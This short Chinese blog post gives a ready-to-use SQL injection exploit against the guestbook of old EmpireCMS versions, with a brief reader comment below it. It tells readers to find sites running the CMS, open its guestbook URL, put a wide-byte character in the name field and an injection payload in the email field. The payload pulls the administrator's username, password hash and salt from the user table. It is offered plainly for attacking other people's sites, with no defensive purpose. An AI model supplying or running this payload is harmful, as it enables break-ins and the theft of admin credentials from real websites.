帝国老版本留言板爆账户漏洞

 找到使用帝国CMS的站,网址后面直接加:e/tool/gbook/?bid=1

    出来的是帝国CMS的留言本,在姓名处写:縗

    联系邮箱处写:,1,1,1,(select concat(username,0×5f,password,0×5f,rnd) from

    phome_enewsuser where userid=1),1,1,1,0,0,0)/*

    提交后爆出账号密码

非凡网 博客

我只是帮你筛选价值。

你也许喜欢

1 回复

  1. 热腾网说道:

    俺嫌帝国后台麻烦,常用织梦,有了漏洞没人补以后,cms就随便选这用了。企业站常用aspcms

发表评论